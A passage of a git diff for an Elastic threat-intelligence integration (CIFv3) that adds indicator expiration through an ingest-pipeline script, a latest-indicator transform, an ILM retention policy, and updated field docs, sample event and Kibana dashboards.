'ipv4-addr' || ctx.threat.indicator.type == 'ipv6-addr') { + _tmp_deleted_at = _tmp_lasttime_at.plusDays(45L); + ctx.cif3.expiration_duration = "45d"; + } else if (ctx.threat.indicator.type == 'domain-name') { + _tmp_deleted_at = _tmp_lasttime_at.plusDays(90L); + ctx.cif3.expiration_duration = "90d"; + } else if (ctx.threat.indicator.type == 'url' || ctx.threat.indicator.type == 'file') { + _tmp_deleted_at = _tmp_lasttime_at.plusDays(365L); + ctx.cif3.expiration_duration = "365d"; + } else { + def dur = ctx._conf.ioc_expiration_duration; + ctx.cif3.expiration_duration = ctx._conf.ioc_expiration_duration; + if (dur instanceof String){ + String time_unit = dur.substring(dur.length() - 1, dur.length()); + String time_value = dur.substring(0, dur.length() - 1); + if (time_unit == 'd') { + _tmp_deleted_at = _tmp_lasttime_at.plusDays(Long.parseLong(time_value)); + } else if (time_unit == 'h') { + _tmp_deleted_at = _tmp_lasttime_at.plusHours(Long.parseLong(time_value)); + } else if (time_unit == 'm') { + _tmp_deleted_at = _tmp_lasttime_at.plusMinutes(Long.parseLong(time_value)); + } else { + _tmp_deleted_at = _tmp_lasttime_at.plusDays(90L); + if (ctx.error == null) { + ctx.error = new HashMap(); + } + if (ctx.error.message == null) { + ctx.error.message = new ArrayList(); + } + ctx.error.message.add('invalid ioc_expiration_duration: using default 90 days'); + } + } + } + ctx.cif3.deleted_at = _tmp_deleted_at; + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - date: + field: cif3.deleted_at + tag: date_deleted_at + target_field: cif3.deleted_at + formats: + - ISO8601 + - UNIX + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: _conf.ioc_expiration_duration + tag: rename_conf_ioc_expiration_duration + target_field: cif3.expiration_duration + if: ctx.cif3?.expiration_duration == null + + ###################### + # Cleanup processors # + ###################### - script: lang: painless if: ctx.cif3 != null @@ -319,12 +409,11 @@ processors: if: "ctx.cif3?.rdata == ''" - remove: field: event.original - if: "ctx.tags == null || !(ctx.tags.contains('preserve_original_event'))" + if: "ctx.tags?.contains('preserve_original_event') != true" ignore_failure: true ignore_missing: true - remove: field: - - cif3.indicator - cif3.confidence - cif3.indicator_ipv4 - cif3.indicator_ipv6 @@ -336,8 +425,11 @@ processors: - cif3.region - cif3.tags - cif3.tlp + - cif3.firsttime + - cif3.lasttime - message - _tmp + - _conf ignore_missing: true if: ctx.threat?.indicator?.type != null on_failure: diff --git a/packages/ti_cif3/data_stream/feed/fields/ecs.yml b/packages/ti_cif3/data_stream/feed/fields/ecs.yml index ef9d73ddd42..18abb0a68db 100644 --- a/packages/ti_cif3/data_stream/feed/fields/ecs.yml +++ b/packages/ti_cif3/data_stream/feed/fields/ecs.yml @@ -10,6 +10,8 @@ name: related.hash - external: ecs name: related.ip +- external: ecs + name: related.hosts - external: ecs name: event.created - external: ecs @@ -98,3 +100,7 @@ name: threat.indicator.geo.region_name - external: ecs name: threat.indicator.geo.timezone +- external: ecs + name: threat.indicator.name +- external: ecs + name: labels diff --git a/packages/ti_cif3/data_stream/feed/fields/fields.yml b/packages/ti_cif3/data_stream/feed/fields/fields.yml index 4977ea2d804..5302be91e98 100644 --- a/packages/ti_cif3/data_stream/feed/fields/fields.yml +++ b/packages/ti_cif3/data_stream/feed/fields/fields.yml @@ -104,3 +104,15 @@ - name: indicator_ssdeep_double_chunk type: text description: SSDEEP hash double chunk. + - name: deleted_at + type: date + description: | + The indicator expiration timestamp. + - name: expiration_duration + type: keyword + description: | + The configured expiration duration. +- name: labels.is_ioc_transform_source + type: constant_keyword + value: "true" + description: Field indicating if its the transform source for supporting IOC expiration. This field is dropped from destination indices to facilitate easier filtering of indicators. diff --git a/packages/ti_cif3/data_stream/feed/lifecycle.yml b/packages/ti_cif3/data_stream/feed/lifecycle.yml new file mode 100644 index 00000000000..5a4af9095b7 --- /dev/null +++ b/packages/ti_cif3/data_stream/feed/lifecycle.yml @@ -0,0 +1 @@ +data_retention: "5d" diff --git a/packages/ti_cif3/data_stream/feed/manifest.yml b/packages/ti_cif3/data_stream/feed/manifest.yml index 27632206134..9cea30af8f9 100644 --- a/packages/ti_cif3/data_stream/feed/manifest.yml +++ b/packages/ti_cif3/data_stream/feed/manifest.yml @@ -1,5 +1,6 @@ title: "CIFv3 Feed" type: logs +ilm_policy: logs-ti_cif3.feed-default_policy streams: - input: httpjson template_path: httpjson.yml.hbs @@ -69,6 +70,15 @@ streams: # default: |- # #tlp: white # description: "Optional REST API Feed filters supported by [CIFv3](https://github.com/csirtgadgets/bearded-avenger/blob/master/cif/httpd/common.py#L7-L9)." + - name: ioc_expiration_duration + type: text + title: IOC Expiration Duration + multi: false + required: true + show_user: true + default: "730d" + description: >- + Enforces all IOCs to expire after this duration since their report time indicated in the feed. Use [Elasticsearch time units](https://www.elastic.co/guide/en/elasticsearch/reference/current/api-conventions.html#time-units) in days, hours, or minutes (e.g 90d) - name: ssl type: yaml title: SSL diff --git a/packages/ti_cif3/data_stream/feed/sample_event.json b/packages/ti_cif3/data_stream/feed/sample_event.json index 0ec10cfc672..17073fd0730 100755 --- a/packages/ti_cif3/data_stream/feed/sample_event.json +++ b/packages/ti_cif3/data_stream/feed/sample_event.json @@ -1,13 +1,16 @@ { - "@timestamp": "2023-08-08T18:44:20.288Z", + "@timestamp": "2024-04-10T04:46:58.281Z", "agent": { - "ephemeral_id": "01cfb0f6-6879-48c3-a90f-2f8c5274de1f", - "id": "0a5c1566-c6fd-4e91-b96d-4083445a000e", + "ephemeral_id": "94c530db-5c8f-407c-939b-cd1d21d547fc", + "id": "28f0e936-c71c-4f75-8919-506fed4d20e7", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.9.0" + "version": "8.12.1" }, "cif3": { + "deleted_at": "2022-09-03T20:25:53.000Z", + "expiration_duration": "45d", + "indicator": "20.206.75.106", "itype": "ipv4", "portlist": "443", "uuid": "ac240898-1443-4d7e-a98a-1daed220c162" @@ -21,18 +24,18 @@ "version": "8.11.0" }, "elastic_agent": { - "id": "0a5c1566-c6fd-4e91-b96d-4083445a000e", + "id": "28f0e936-c71c-4f75-8919-506fed4d20e7", "snapshot": false, - "version": "8.9.0" + "version": "8.12.1" }, "event": { "agent_id_status": "verified", "category": [ "threat" ], - "created": "2023-08-08T18:44:20.288Z", + "created": "2024-04-10T04:46:58.281Z", "dataset": "ti_cif3.feed", - "ingested": "2023-08-08T18:44:23Z", + "ingested": "2024-04-10T04:47:10Z", "kind": "enrichment", "original": "{\"application\":\"https\",\"asn\":8075,\"asn_desc\":\"microsoft-corp-msn-as-block\",\"cc\":\"br\",\"city\":\"campinas\",\"confidence\":10,\"count\":1,\"firsttime\":\"2022-07-20T20:25:53.000000Z\",\"group\":[\"everyone\"],\"indicator\":\"20.206.75.106\",\"indicator_ipv4\":\"20.206.75.106\",\"itype\":\"ipv4\",\"lasttime\":\"2022-07-20T20:25:53.000000Z\",\"latitude\":-22.9035,\"location\":[-47.0565,-22.9035],\"longitude\":-47.0565,\"portlist\":\"443\",\"protocol\":\"tcp\",\"provider\":\"sslbl.abuse.ch\",\"reference\":\"https://sslbl.abuse.ch/blacklist/sslipblacklist.csv\",\"region\":\"sao paulo\",\"reporttime\":\"2022-07-21T20:33:26.585967Z\",\"tags\":[\"botnet\"],\"timezone\":\"america/sao_paulo\",\"tlp\":\"white\",\"uuid\":\"ac240898-1443-4d7e-a98a-1daed220c162\"}", "type": [ @@ -66,7 +69,7 @@ } }, "confidence": "High", - "first_seen": "2022-07-20T20:25:53.000000Z", + "first_seen": "2022-07-20T20:25:53.000Z", "geo": { "country_iso_code": "br", "location": { @@ -77,15 +80,16 @@ "timezone": "america/sao_paulo" }, "ip": "20.206.75.106", - "last_seen": "2022-07-20T20:25:53.000000Z", + "last_seen": "2022-07-20T20:25:53.000Z", "marking": { "tlp": "WHITE" }, "modified_at": "2022-07-21T20:33:26.585967Z", + "name": "20.206.75.106", "provider": "sslbl.abuse.ch", "reference": "https://sslbl.abuse.ch/blacklist/sslipblacklist.csv", "sightings": 1, "type": "ipv4-addr" } } -} +} \ No newline at end of file diff --git a/packages/ti_cif3/docs/README.md b/packages/ti_cif3/docs/README.md index 70e2d6fd422..666dae4a399 100644 --- a/packages/ti_cif3/docs/README.md +++ b/packages/ti_cif3/docs/README.md @@ -2,6 +2,21 @@ This integration connects with the [REST API from the running CIFv3 instance](https://github.com/csirtgadgets/bearded-avenger-deploymentkit/wiki/REST-API) to retrieve indicators. +## Expiration of Indicators of Compromise (IOCs) +Indicators are expired after a certain duration. An [Elastic Transform](https://www.elastic.co/guide/en/elasticsearch/reference/current/transforms.html) is created for a source index to allow only active indicators to be available to the end users. The transform creates a destination index named `logs-ti_cif3_latest.dest_feed*` which only contains active and unexpired indicators. Destination indices are aliased to `logs-ti_cif3_latest.feed`. The indicator match rules and dashboards are updated to show only active indicators. + +| Indicator Type | Indicator Expiration Duration | +|:------------------|:------------------------------------------------| +| `ipv4-addr` | `45d` | +| `ipv6-addr` | `45d` | +| `domain-name` | `90d` | +| `url` | `365d` | +| `file` | `365d` | +| All Other Types | Derived from `IOC Expiration Duration` setting | + +### ILM Policy +To facilitate IOC expiration, source datastream-backed indices `.ds-logs-ti_cif3.feed-*` are allowed to contain duplicates. ILM policy `logs-ti_cif3.feed-default_policy` is added to these source indices so it doesn't lead to unbounded growth. This means data in these source indices will be deleted after `5 days` from ingested date. + ## Data Streams ### Feed @@ -29,7 +44,9 @@ CIFv3 `confidence` field values (0..10) are converted to ECS confidence (None, L | cif3.city | GeoIP city information. | keyword | | cif3.confidence | The confidence on a scale of 0-10 that the tags appropriately contextualize the indicator. | float | | cif3.count | The number of times the same indicator has been reported with the same metadata by the same provider. | integer | +| cif3.deleted_at | The indicator expiration timestamp. | date | | cif3.description | A description of the indicator. | keyword | +| cif3.expiration_duration | The configured expiration duration. | keyword | | cif3.indicator | The value of the indicator, for example if the type is fqdn, this would be the value. | keyword | | cif3.indicator_iprange | IPv4 or IPv6 IP Range. | ip_range | | cif3.indicator_ipv4 | IPv4 address. | ip | @@ -67,6 +84,8 @@ CIFv3 `confidence` field values (0..10) are converted to ECS confidence (None, L | event.provider | Source of the event. Event transports such as Syslog or the Windows Event Log typically mention the source of an event. It can be the name of the software that generated the event (e.g. Sysmon, httpd), or of a subsystem of the operating system (kernel, Microsoft-Windows-Security-Auditing). | keyword | | event.type | This is one of four ECS Categorization Fields, and indicates the third level in the ECS category hierarchy. `event.type` represents a categorization "sub-bucket" that, when used along with the `event.category` field values, enables filtering events down to a level appropriate for single visualization. This field is an array. This will allow proper categorization of some events that fall in multiple event types. | keyword | | input.type | Type of Filebeat input. | keyword | +| labels | Custom key/value pairs. Can be used to add meta information to events. Should not contain nested objects. All values are stored as keyword. Example: `docker` and `k8s` labels. | object | +| labels.is_ioc_transform_source | Field indicating if its the transform source for supporting IOC expiration. This field is dropped from destination indices to facilitate easier filtering of indicators. | constant_keyword | | log.file.path | Path to the log file. | keyword | | log.flags | Flags for the log file. | keyword | | log.offset | Offset of the entry in the log file. | long | @@ -74,6 +93,7 @@ CIFv3 `confidence` field values (0..10) are converted to ECS confidence (None, L | network.protocol | In the OSI Model this would be the Application Layer protocol. For example, `http`, `dns`, or `ssh`. The field value must be normalized to lowercase for querying. | keyword | | network.transport | Same as network.iana_number, but instead using the Keyword name of the transport layer (udp, tcp, ipv6-icmp, etc.) The field value must be normalized to lowercase for querying. | keyword | | related.hash | All the hashes seen on your event. Populating this field, then using it to search for hashes can help in situations where you're unsure what the hash algorithm is (and therefore which key name to search). | keyword | +| related.hosts | All hostnames or other host identifiers seen on your event. Example identifiers include FQDNs, domain names, workstation names, or aliases. | keyword | | related.ip | All of the IPs seen on your event. | ip | | tags | List of keywords used to tag each event. | keyword | | threat.feed.name | Display friendly feed name | constant_keyword | @@ -99,6 +119,7 @@ CIFv3 `confidence` field values (0..10) are converted to ECS confidence (None, L | threat.indicator.last_seen | The date and time when intelligence source last reported sighting this indicator. | date | | threat.indicator.marking.tlp | Traffic Light Protocol sharing markings. | keyword | | threat.indicator.modified_at | The date and time when intelligence source last modified information for this indicator. | date | +| threat.indicator.name | The display name indicator in an UI friendly format URL, IP address, email address, registry key, port number, hash value, or other relevant name can serve as the display name. | keyword | | threat.indicator.provider | The name of the indicator's provider. | keyword | | threat.indicator.reference | Reference URL linking to additional information about this indicator. | keyword | | threat.indicator.sightings | Number of times this indicator was observed conducting threat activity. | long | @@ -120,15 +141,18 @@ An example event for `feed` looks as following: ```json { - "@timestamp": "2023-08-08T18:44:20.288Z", + "@timestamp": "2024-04-10T04:46:58.281Z", "agent": { - "ephemeral_id": "01cfb0f6-6879-48c3-a90f-2f8c5274de1f", - "id": "0a5c1566-c6fd-4e91-b96d-4083445a000e", + "ephemeral_id": "94c530db-5c8f-407c-939b-cd1d21d547fc", + "id": "28f0e936-c71c-4f75-8919-506fed4d20e7", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.9.0" + "version": "8.12.1" }, "cif3": { + "deleted_at": "2022-09-03T20:25:53.000Z", + "expiration_duration": "45d", + "indicator": "20.206.75.106", "itype": "ipv4", "portlist": "443", "uuid": "ac240898-1443-4d7e-a98a-1daed220c162" @@ -142,18 +166,18 @@ An example event for `feed` looks as following: "version": "8.11.0" }, "elastic_agent": { - "id": "0a5c1566-c6fd-4e91-b96d-4083445a000e", + "id": "28f0e936-c71c-4f75-8919-506fed4d20e7", "snapshot": false, - "version": "8.9.0" + "version": "8.12.1" }, "event": { "agent_id_status": "verified", "category": [ "threat" ], - "created": "2023-08-08T18:44:20.288Z", + "created": "2024-04-10T04:46:58.281Z", "dataset": "ti_cif3.feed", - "ingested": "2023-08-08T18:44:23Z", + "ingested": "2024-04-10T04:47:10Z", "kind": "enrichment", "original": "{\"application\":\"https\",\"asn\":8075,\"asn_desc\":\"microsoft-corp-msn-as-block\",\"cc\":\"br\",\"city\":\"campinas\",\"confidence\":10,\"count\":1,\"firsttime\":\"2022-07-20T20:25:53.000000Z\",\"group\":[\"everyone\"],\"indicator\":\"20.206.75.106\",\"indicator_ipv4\":\"20.206.75.106\",\"itype\":\"ipv4\",\"lasttime\":\"2022-07-20T20:25:53.000000Z\",\"latitude\":-22.9035,\"location\":[-47.0565,-22.9035],\"longitude\":-47.0565,\"portlist\":\"443\",\"protocol\":\"tcp\",\"provider\":\"sslbl.abuse.ch\",\"reference\":\"https://sslbl.abuse.ch/blacklist/sslipblacklist.csv\",\"region\":\"sao paulo\",\"reporttime\":\"2022-07-21T20:33:26.585967Z\",\"tags\":[\"botnet\"],\"timezone\":\"america/sao_paulo\",\"tlp\":\"white\",\"uuid\":\"ac240898-1443-4d7e-a98a-1daed220c162\"}", "type": [ @@ -187,7 +211,7 @@ An example event for `feed` looks as following: } }, "confidence": "High", - "first_seen": "2022-07-20T20:25:53.000000Z", + "first_seen": "2022-07-20T20:25:53.000Z", "geo": { "country_iso_code": "br", "location": { @@ -198,11 +222,12 @@ An example event for `feed` looks as following: "timezone": "america/sao_paulo" }, "ip": "20.206.75.106", - "last_seen": "2022-07-20T20:25:53.000000Z", + "last_seen": "2022-07-20T20:25:53.000Z", "marking": { "tlp": "WHITE" }, "modified_at": "2022-07-21T20:33:26.585967Z", + "name": "20.206.75.106", "provider": "sslbl.abuse.ch", "reference": "https://sslbl.abuse.ch/blacklist/sslipblacklist.csv", "sightings": 1, @@ -210,5 +235,4 @@ An example event for `feed` looks as following: } } } - ``` diff --git a/packages/ti_cif3/elasticsearch/transform/latest_threat/fields/base-fields.yml b/packages/ti_cif3/elasticsearch/transform/latest_threat/fields/base-fields.yml new file mode 100644 index 00000000000..4b8c057a9ae --- /dev/null +++ b/packages/ti_cif3/elasticsearch/transform/latest_threat/fields/base-fields.yml @@ -0,0 +1,24 @@ +- name: data_stream.type + type: constant_keyword + description: Data stream type. +- name: data_stream.dataset + type: constant_keyword + description: Data stream dataset. +- name: data_stream.namespace + type: constant_keyword + description: Data stream namespace. +- name: '@timestamp' + type: date + description: Event timestamp. +- name: event.module + type: constant_keyword + description: Name of the module this data is coming from. + value: ti_cif3 +- name: threat.feed.name + type: constant_keyword + description: Display friendly feed name + value: cif3 +- name: event.dataset + type: constant_keyword + description: Event dataset + value: ti_cif3.feed diff --git a/packages/ti_cif3/elasticsearch/transform/latest_threat/fields/beats.yml b/packages/ti_cif3/elasticsearch/transform/latest_threat/fields/beats.yml new file mode 100644 index 00000000000..cb44bb29442 --- /dev/null +++ b/packages/ti_cif3/elasticsearch/transform/latest_threat/fields/beats.yml @@ -0,0 +1,12 @@ +- name: input.type + type: keyword + description: Type of Filebeat input. +- name: log.flags + type: keyword + description: Flags for the log file. +- name: log.offset + type: long + description: Offset of the entry in the log file. +- name: log.file.path + type: keyword + description: Path to the log file. diff --git a/packages/ti_cif3/elasticsearch/transform/latest_threat/fields/ecs.yml b/packages/ti_cif3/elasticsearch/transform/latest_threat/fields/ecs.yml new file mode 100644 index 00000000000..18abb0a68db --- /dev/null +++ b/packages/ti_cif3/elasticsearch/transform/latest_threat/fields/ecs.yml @@ -0,0 +1,106 @@ +- external: ecs + name: ecs.version +- external: ecs + name: message +- external: ecs + name: error.message +- external: ecs + name: tags +- external: ecs + name: related.hash +- external: ecs + name: related.ip +- external: ecs + name: related.hosts +- external: ecs + name: event.created +- external: ecs + name: event.ingested +- external: ecs + name: event.kind +- external: ecs + name: event.category +- external: ecs + name: event.provider +- external: ecs + name: event.type +- external: ecs + name: event.original +- external: ecs + name: network.protocol +- external: ecs + name: network.transport +- external: ecs + name: threat.indicator.type +- external: ecs + name: threat.indicator.first_seen +- external: ecs + name: threat.indicator.last_seen +- external: ecs + name: threat.indicator.modified_at +- external: ecs + name: threat.indicator.reference +- external: ecs + name: threat.indicator.description +- external: ecs + name: threat.indicator.sightings +- external: ecs + name: threat.indicator.file.type +- external: ecs + name: threat.indicator.file.hash.md5 +- external: ecs + name: threat.indicator.file.hash.sha1 +- external: ecs + name: threat.indicator.file.hash.sha256 +- external: ecs + name: threat.indicator.file.hash.sha512 +- external: ecs + name: threat.indicator.file.pe.imphash +- external: ecs + name: threat.indicator.file.hash.ssdeep +- name: threat.indicator.tls.client.ja3 + level: extended + type: keyword + description: An md5 hash that identifies clients based on their TLS handshake. +- external: ecs + name: threat.indicator.email.address +- external: ecs + name: threat.indicator.ip +- external: ecs + name: threat.indicator.url.domain +- external: ecs + name: threat.indicator.url.full +- external: ecs + name: threat.indicator.url.extension +- external: ecs + name: threat.indicator.url.original +- external: ecs + name: threat.indicator.url.path +- external: ecs + name: threat.indicator.url.port +- external: ecs + name: threat.indicator.url.scheme +- external: ecs + name: threat.indicator.url.query +- external: ecs + name: threat.indicator.provider +- external: ecs + name: threat.indicator.as.number +- external: ecs + name: threat.indicator.as.organization.name +- external: ecs + name: threat.indicator.marking.tlp +- external: ecs + name: threat.indicator.confidence +- external: ecs + name: threat.indicator.geo.location +- external: ecs + name: threat.indicator.geo.country_iso_code +- external: ecs + name: threat.indicator.geo.region_name +- external: ecs + name: threat.indicator.geo.timezone +- external: ecs + name: threat.indicator.name +- external: ecs + name: labels diff --git a/packages/ti_cif3/elasticsearch/transform/latest_threat/fields/fields.yml b/packages/ti_cif3/elasticsearch/transform/latest_threat/fields/fields.yml new file mode 100644 index 00000000000..27a986f3221 --- /dev/null +++ b/packages/ti_cif3/elasticsearch/transform/latest_threat/fields/fields.yml @@ -0,0 +1,114 @@ +- name: cif3 + type: group + description: Fields for CIFv3 Threat Indicators + fields: + - name: uuid + type: keyword + description: The ID of the indicator. + - name: indicator + type: keyword + description: > + The value of the indicator, for example if the type is fqdn, this would be the value. + + - name: description + type: keyword + description: A description of the indicator. + - name: rdata + type: keyword + description: > + Extra text or descriptive content related to the indicator such as OS, reverse lookup, etc. + + - name: reference + type: keyword + description: A reference URL with further info related to the indicator. + - name: itype + type: keyword + description: > + The indicator type, can for example be "ipv4, fqdn, email, url, sha256". + + - name: tags + type: keyword + description: > + Comma-separated list of words describing the indicator such as "malware,exploit". + + - name: confidence + type: float + description: > + The confidence on a scale of 0-10 that the tags appropriately contextualize the indicator. + + - name: provider + type: keyword + description: The source of the indicator information. + - name: application + type: keyword + description: The application used by the indicator, such as telnet or ssh. + - name: protocol + type: text + description: The protocol used by the indicator. + - name: portlist + type: text + description: The port or range of ports used by the indicator. + - name: city + type: keyword + description: GeoIP city information. + - name: region + type: keyword + description: GeoIP region information. + - name: count + type: integer + description: > + The number of times the same indicator has been reported with the same metadata by the same provider. + + - name: cc + type: keyword + description: Country code of GeoIP. + - name: location + type: geo_point + description: Lat/Long of GeoIP. + - name: latitude + type: keyword + description: Latitude of GeoIP. + - name: longitude + type: keyword + description: Longitude of GeoIP. + - name: timezone + type: text + description: Timezone of GeoIP. + - name: asn + type: integer + description: AS Number of IP. + - name: asn_desc + type: keyword + description: AS Number org name. + - name: indicator_ipv4 + type: ip + description: IPv4 address. + - name: indicator_ipv4_mask + type: integer + description: subnet mask of IPv4 CIDR. + - name: indicator_ipv6 + type: keyword + description: singleton IPv6 address. + - name: indicator_ipv6_mask + type: integer + description: subnet mask of IPv6 CIDR. + - name: indicator_iprange + type: ip_range + description: IPv4 or IPv6 IP Range. + - name: indicator_ssdeep_chunksize + type: integer + description: SSDEEP hash chunk size. + - name: indicator_ssdeep_chunk + type: text + description: SSDEEP hash chunk. + - name: indicator_ssdeep_double_chunk + type: text + description: SSDEEP hash double chunk. + - name: deleted_at + type: date + description: | + The indicator expiration timestamp. + - name: expiration_duration + type: keyword + description: | + The configured expiration duration. diff --git a/packages/ti_cif3/elasticsearch/transform/latest_threat/manifest.yml b/packages/ti_cif3/elasticsearch/transform/latest_threat/manifest.yml new file mode 100644 index 00000000000..f5296fd0c0a --- /dev/null +++ b/packages/ti_cif3/elasticsearch/transform/latest_threat/manifest.yml @@ -0,0 +1,18 @@ +start: true +destination_index_template: + settings: + index: + sort: + field: + - "@timestamp" + order: + - desc + mappings: + dynamic: true + dynamic_templates: + - strings_as_keyword: + match_mapping_type: string + mapping: + ignore_above: 1024 + type: keyword + date_detection: false diff --git a/packages/ti_cif3/elasticsearch/transform/latest_threat/transform.yml b/packages/ti_cif3/elasticsearch/transform/latest_threat/transform.yml new file mode 100644 index 00000000000..daad2501296 --- /dev/null +++ b/packages/ti_cif3/elasticsearch/transform/latest_threat/transform.yml @@ -0,0 +1,43 @@ +# Use of "*" to use all namespaces defined. +source: + index: + - "logs-ti_cif3.feed-*" + query: + bool: + must_not: + exists: + field: error.message +# The version suffix on the dest.index should be incremented if a breaking change +# is made to the index mapping. You must also bump the fleet_transform_version +# for any change to this transform configuration to take effect. The old destination +# index is not automatically deleted. We are dependent on https://github.com/elastic/package-spec/issues/523 to give +# us that ability in order to prevent having duplicate IoC data and prevent query +# time field type conflicts. +dest: + index: "logs-ti_cif3_latest.dest_feed-1" + aliases: + - alias: "logs-ti_cif3_latest.feed" + move_on_creation: true +latest: + unique_key: + - event.dataset + - cif3.uuid + - cif3.indicator + sort: '@timestamp' +description: Latest Indicator data retrieved from CIFv3. +frequency: 30s +sync: + time: + field: event.ingested + # Updated to 120s because of refresh delay in Serverless. With default 60s, sometimes transform wouldn't process all documents. + delay: 120s +retention_policy: + time: + field: cif3.deleted_at + # Delete immediately after reaching the `deleted_at` timestamp. + max_age: 1m +_meta: + managed: true + # Bump this version to delete, reinstall, and restart the transform during package. + # Version bump is needed if there is any code change in transform. + fleet_transform_version: 0.1.0 diff --git a/packages/ti_cif3/kibana/dashboard/ti_cif3-6005a190-0aba-11ed-bcc0-01c79f2670f3.json b/packages/ti_cif3/kibana/dashboard/ti_cif3-6005a190-0aba-11ed-bcc0-01c79f2670f3.json index 0c579cc276a..2916000517e 100644 --- a/packages/ti_cif3/kibana/dashboard/ti_cif3-6005a190-0aba-11ed-bcc0-01c79f2670f3.json +++ b/packages/ti_cif3/kibana/dashboard/ti_cif3-6005a190-0aba-11ed-bcc0-01c79f2670f3.json @@ -1,7 +1,6 @@ { "attributes": { "description": "Dashboard providing statistics about FQDN type indicators from the Collective Intelligence Framework v3 integration", - "hits": 0, "kibanaSavedObjectMeta": { "searchSourceJSON": { "filter": [ @@ -46,6 +45,28 @@ "data_stream.dataset": "ti_cif3.feed" } } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "labels.is_ioc_transform_source", + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[2].meta.index", + "key": "labels.is_ioc_transform_source", + "negate": true, + "params": { + "query": "true" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "labels.is_ioc_transform_source": "true" + } + } } ], "query": { @@ -57,6 +78,8 @@ "optionsJSON": { "hidePanelTitles": false, "syncColors": false, + "syncCursor": true, + "syncTooltips": false, "useMargins": true }, "panelsJSON": [ @@ -96,8 +119,7 @@ }, "panelIndex": "4c3ed6e1-8b4e-4eab-8d84-70ed4f506216", "title": "Files Navigation Textbox [Logs CIFv3]", - "type": "visualization", - "version": "8.0.0-SNAPSHOT" + "type": "visualization" }, { "embeddableConfig": { @@ -116,7 +138,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "c94400ee-a135-4a99-9693-5879d29f7aad": { "columnOrder": [ @@ -154,7 +176,7 @@ }, "title": "", "type": "lens", - "visualizationType": "lnsMetric" + "visualizationType": "lnsLegacyMetric" }, "enhancements": {}, "hidePanelTitles": false @@ -168,8 +190,7 @@ }, "panelIndex": "02f1732b-a981-4fba-8b27-b944f2f3c98c", "title": "Unique Domains [Logs CIFv3]", - "type": "lens", - "version": "8.0.0-SNAPSHOT" + "type": "lens" }, { "embeddableConfig": { @@ -188,7 +209,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "09bca2c1-c599-4575-be8a-a416589c7082": { "columnOrder": [ @@ -247,7 +268,9 @@ } ], "layerId": "09bca2c1-c599-4575-be8a-a416589c7082", - "layerType": "data" + "layerType": "data", + "rowHeight": "single", + "rowHeightLines": 1 } }, "title": "", @@ -266,19 +289,17 @@ }, "panelIndex": "c2db10e8-0e7e-4199-b787-48e14bd2e2fe", "title": "Sample of Domains [Logs CIFv3]", - "type": "lens", - "version": "8.0.0-SNAPSHOT" + "type": "lens" } ], "timeRestore": false, "title": "[Logs CIFv3] FQDNs", "version": 1 }, - "coreMigrationVersion": "8.0.0", + "coreMigrationVersion": "8.8.0", + "created_at": "2024-04-08T18:38:36.375Z", "id": "ti_cif3-6005a190-0aba-11ed-bcc0-01c79f2670f3", - "migrationVersion": { - "dashboard": "8.0.0" - }, + "managed": false, "references": [ { "id": "logs-*", @@ -290,6 +311,11 @@ "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index", "type": "index-pattern" }, + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[2].meta.index", + "type": "index-pattern" + }, { "id": "logs-*", "name": "02f1732b-a981-4fba-8b27-b944f2f3c98c:indexpattern-datasource-current-indexpattern", @@ -312,9 +338,15 @@ }, { "id": "ti_cif3-ec8c3e30-0c59-11ed-9b65-435777f1d8a1", - "name": "tag-ti_cif3-ec8c3e30-0c59-11ed-9b65-435777f1d8a1", + "name": "tag-ref-ti_cif3-ec8c3e30-0c59-11ed-9b65-435777f1d8a1", + "type": "tag" + }, + { + "id": "ti_cif3-security-solution-default", + "name": "tag-ref-security-solution-default", "type": "tag" } ], - "type": "dashboard" + "type": "dashboard", + "typeMigrationVersion": "8.9.0" } \ No newline at end of file diff --git a/packages/ti_cif3/kibana/dashboard/ti_cif3-63a0e470-0a30-11ed-bcc0-01c79f2670f3.json b/packages/ti_cif3/kibana/dashboard/ti_cif3-63a0e470-0a30-11ed-bcc0-01c79f2670f3.json index bb03146dc6d..c7d7fcac037 100644 --- a/packages/ti_cif3/kibana/dashboard/ti_cif3-63a0e470-0a30-11ed-bcc0-01c79f2670f3.json +++ b/packages/ti_cif3/kibana/dashboard/ti_cif3-63a0e470-0a30-11ed-bcc0-01c79f2670f3.json @@ -1,7 +1,6 @@ { "attributes": { "description": "Dashboard providing statistics about File type indicators from the Collective Intelligence Framework v3 integration", - "hits": 0, "kibanaSavedObjectMeta": { "searchSourceJSON": { "filter": [ @@ -46,6 +45,28 @@ "data_stream.dataset": "ti_cif3.feed" } } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "labels.is_ioc_transform_source", + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[2].meta.index", + "key": "labels.is_ioc_transform_source", + "negate": true, + "params": { + "query": "true" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "labels.is_ioc_transform_source": "true" + } + } } ], "query": { @@ -57,6 +78,8 @@ "optionsJSON": { "hidePanelTitles": false, "syncColors": false, + "syncCursor": true, + "syncTooltips": false, "useMargins": true }, "panelsJSON": [ @@ -95,8 +118,7 @@ }, "panelIndex": "09ba3dc0-e2e2-4799-b47f-bb919bf290a1", "title": "Files Navigation Textbox [Logs CIFv3]", - "type": "visualization", - "version": "8.0.0-SNAPSHOT" + "type": "visualization" }, { "embeddableConfig": { @@ -119,7 +141,7 @@ }, "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "b83c382d-fab9-4e60-a632-475e221cc20c": { "columnOrder": [ @@ -156,7 +178,7 